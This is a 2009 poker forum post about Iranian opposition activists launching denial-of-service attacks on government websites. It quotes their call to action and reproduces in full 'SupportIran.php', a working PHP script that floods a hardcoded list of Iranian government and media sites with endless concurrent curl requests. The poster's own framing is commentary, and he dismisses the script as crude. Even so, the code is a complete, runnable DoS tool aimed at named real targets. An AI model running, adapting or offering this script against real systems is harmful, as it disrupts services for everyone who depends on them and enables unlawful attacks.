Banner
donkdown

Who Is Chatting

Chatroom is empty

Chat Now

Account Login

MANDATORY: Former NeverWinPoker users, please click HERE to reset your password



Banner
Banner
Banner

Micon's Hot Tweets

BryanMicon: gl to @TheGrinder44 in @BellagioLV $25k MTT / just love to see him win for some reason / I know @EricMizrachi won't miss da @wptliveupdates
BryanMicon: RT @DonkDown: I have spawned another radio show: http://t.co/wyndDiSj @saramar13 @BryanMicon @Pokerati
BryanMicon: RT @stealthmunk: Made sickest call of my life in a crazy .6-1.2 btc hand on @SealsWithClubs poker. Games are crazy! Come play! Better than any US site by far
BryanMicon: RT @50cent RT @Lloydbanks cuz go head switch yo style up and if they hate then let 'em hate and watch the money pile up


Search This Topic:
Jump to:  


Post new topic Reply to topic  [ 1 post ] 
"peoples information warfare" redux 
Author Message
DD InfoSec Oyabun
User avatar

Profile
Degen Index: 55
Joined: 04 Feb 2007
Posts: 8622
Very interesting things are afoot in Iran right now, above and beyond stolen elections and bloody riots.

Taking a page from the Chinese concept of "peoples activism", the so called Opposition is aggressively demolishing Iran's internet infrastructure.

A webpage/portal was established yesterday which enabled people to spawn multi-threaded DOS attacks against Ahmadinjead;


"ALL PEOPLE AROUND THE WORLD:

Please help us in a full-scale cyberwar againts the dictatorial brutal government of Ahmadinjead! Help Iranians to earn back their votes per instructions below:

Simply click on few of the following links (better too choose your selections from different categories); it opens the site in a new tab. It will not stop you from browsing but by sending a refresh signal to the target site will saturate it. By doing so, we can block Ahmadinjead's governments flow of information in many of its key components as shown below. Please help us and yourself from this lunatic who will push the world to world war III."

Due to an unsustainable bandwidth bill, the maintainers of the portal took the site offline early today but released the source code;

Code:
<?php
/*
* SupportIran.php v0.6
* Austin Heap <me@austinheap.com>
*
*  A tiny script on a MULTI mission.
*
*
* You MUST be running PHP 5.2.3 or better and have the Curl (version 7.16.2 or better) PHP module installed
*
*
*      !! There is now a version you can run in your browser !!
*      !! Go to http://dev.austinheap.com/iran/ to start now !!
*
*/

//* Target Iranian gov't sites
$sites = array(
    "http://www.khamenei.ir/",
    "http://www.presstv.ir/",
    "http://www.irna.ir/",
    "http://www.president.ir/",
    "http://www.mfa.gov.ir/",
    "http://www.moi.ir/",
    "http://www.police.ir/",
    "http://www.justice.ir/",
    "http://live.irib.ir/"
);


//* Do the deed
print 'Press Control-C to terminate...LAUNCHING ATTACK: ';

$x = 0;

while ( true ) {

    print '.';

    flush( );

    reqMultiCurls( $sites );

    print '.';

    $x++;

}


function reqMultiCurls( $urls ) {

    $chs = array();
    $contents = array();


    foreach ( $urls as $url ) {

        $ch = curl_init( $url );
        curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
        curl_setopt( $ch, CURLOPT_TIMEOUT, 1 );
        $chs[] = $ch;

    }


    $mh = curl_multi_init();


    foreach ( $chs as $key => $ch ) {

        curl_multi_add_handle( $mh, $ch );

    }


    do {

        $mrc = curl_multi_exec( $mh, $active );

    } while ( $mrc == CURLM_CALL_MULTI_PERFORM  || $active );


    foreach ( $chs as $key => $ch ) {

        if ( curl_errno( $ch ) == CURLE_OK ) {

            $contents[] = curl_multi_getcontent( $ch );

        } else {

            echo "!";

        }

    }

    curl_multi_close( $mh );


    return $contents;

}


This is really very interesting in and of itself; no attempt is even being made to scale up to botnet attacks, for example. The above code is a basic, multi-threaded DOS attack and would have been considered fairly lowbrow a decade ago. It will be very interesting to see what sort of evolutionary curve takes place if/when the opposition forces embrace more efficient methods to take down their own countries infrastructure.

_________________
Wiz' Fruity Pebbles Poetry Contest Runner-Up, probably.
<Ripptyde64> anyway I just wanted to give you some props for your posts....you really have a unique way with words and as a fellow writer I am humbled
<Ripptyde64> lol I just like your style. there are so many useless and moronic poster on these forums and you are vastly superior in quality, form and content.
<BB92> lol i have tits
╭∩╮(︶︿︶)╭∩╮


Tue Jun 16, 2009 7:16 am
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 1 post ] 


Users browsing this topic: No registered users and 1 guest


Similar Topics

 Topics  Forum  Author  Replies
Donald "Duck" Dunn DD... Shooting Off RTKabuto
Sun May 13, 2012 9:23 pm
0
Benjamin "astro-prodigy" Witteles, is this true? Shooting Off bob
Tue May 08, 2012 10:27 am
11
Did Micon miss-spell "Hornswaggle" on May 6th? Shooting Off Taylors Coulette
Mon May 07, 2012 1:42 pm
15
Micon getting ass fucked = "technicial issues?" LOL Shooting Off bitchezbcrazyjuno
Thu May 03, 2012 1:27 pm
12
List of douchebags that are boycotting "Shooting Off" Shooting Off micon
Tue May 01, 2012 9:12 am
51

Search for:
Jump to:  

Poker Blog | Poker Forum | Contact Us | Advertise | Sitemap
Copyright © 2009-2011 Donkdown.com LLC